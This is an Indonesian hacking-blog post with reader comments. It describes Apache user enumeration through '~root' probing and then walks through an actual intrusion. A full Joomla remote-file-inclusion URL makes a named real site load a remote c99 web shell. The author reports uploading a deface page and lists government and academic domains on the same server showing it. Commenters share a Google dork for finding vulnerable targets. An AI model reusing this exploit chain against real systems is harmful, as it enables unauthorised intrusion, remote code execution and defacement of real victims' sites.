Teknik User Enumeration
User Enumeration merupakan kelemahan dari Apache yang memungkinkan kita untuk menjalankan user yang ada di server tersebut.
Cara menguji suatu server vulner terhadap user enumeration – > http://target.com/~root
jika pesan yang muncul “Forbidden” berarti server tersebut vulner.
Pada kasus ini ternyata site http://griyadesign.com/~root muncul pesan “Forbidden” ![]()
Pesan error pada http://griyadesign.com/~root
Saia
coba cari Vulnerability RFI Joomla Component, eh nemu
com_joomla-visites vuln, exploitnya bisa diliat di
http://www.exploit-db.com/exploits/14476/
Ok langsung eksekusi php shellnya
http://griyadesign.com/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.site.com/c99.txt
Yeah, shell bisa dieksekusi, tinggal upload shell dan jgn lupa halaman php atau html kalian, terserah dah ^^
http://griyadesign.com/default.php
Sekarang coba kita cari site mana aja yang satu server sama http://griyadesign.com
klo saia pake : http://www.yougetsignal.com/tools/web-sites-on-web-server/
Ternyata ada puluhan domain disana
)
tadi user http://griyadesign.com pada server adalah griyades
/home/griyades/public_html/
Setelah upload halaman php atau html, sekarang kita coba di beberapa site yang satu server dengan http://griyadesign.com
ini hasilnya :
http://15menit.net/~griyades/default.php
http://www.siakkab.go.id/~griyades/default.php
http://www.iii.ac.id/~griyades/default.php
http://takalarkab.go.id/~griyades/default.php
dll
Tampilan http://takalarkab.go.id/~griyades/default.php
Regards, vYc0d ![]()












maaf bang klo pertanyaannya nubi bnget, tu kok langsung bisa dapet vuln di com_joomla-visites? apa di coba satu2 ya vulnnya?
tinggal googling aja bro
kira2 begini keywordnya -> inurl:”com_joomla-visites”
jika pesan yang muncul “Forbidden” berarti server tersebut vulner.
http://target.com/~root
jadi cara patchnya gimana yah?
emang pasti site yang muncul “Forbidden” kalau di tambahin ~root berarti vulner
wah bahaya tuh site aku vuln begitu >,<
manteep dah bang..

ditunggu tutor brikutnya om..
Video Please…
@alice
bukan sitenya, tapi servernya
konfigurasi apache yg harus dibenahin
klo kita sebagai client, tambahin .htaccess aja
@themoffets
baca pelan2 aja bro, g’ perlu video pasti paham
mautanya nih kalo ngehindarin kita di block gimana ya? soalnya sering banget website yang saya kunjungi jadi gelap ga kebaca, itu kenapa ya? padahal sebelumnya engga. lucunya kalo pake ie ga pernah, atau gimana tlong ya?? saya ga bukan hacker lho
kasih tau donk aku cheat ninja saga donk…..!!!
[...] From : Binus Hacker Original Source : Teknik User Enumeration This entry was posted in Computer, Hacking. Bookmark the permalink. ← Disconnet Linux [...]
oke banget infonya bang….
url not found.. bukan forbiden.. gmn tuu?
aku ingin mendapatka cara cara hacker indonesia
magai
bang kok syntax googling kayak inurl,index.,,,,dsb ga bisa di kompi ane,,,,pasti alamatnya eror
mohon penjelasannya
(numpang promo blog saya…) penjelasan tentang hacking, cracking, tips and trik..bisa kalian liat juga disini http://vjpith.blogspot.com
pengen tau gemana caranya sedot cip.
tolong jelas kan makasih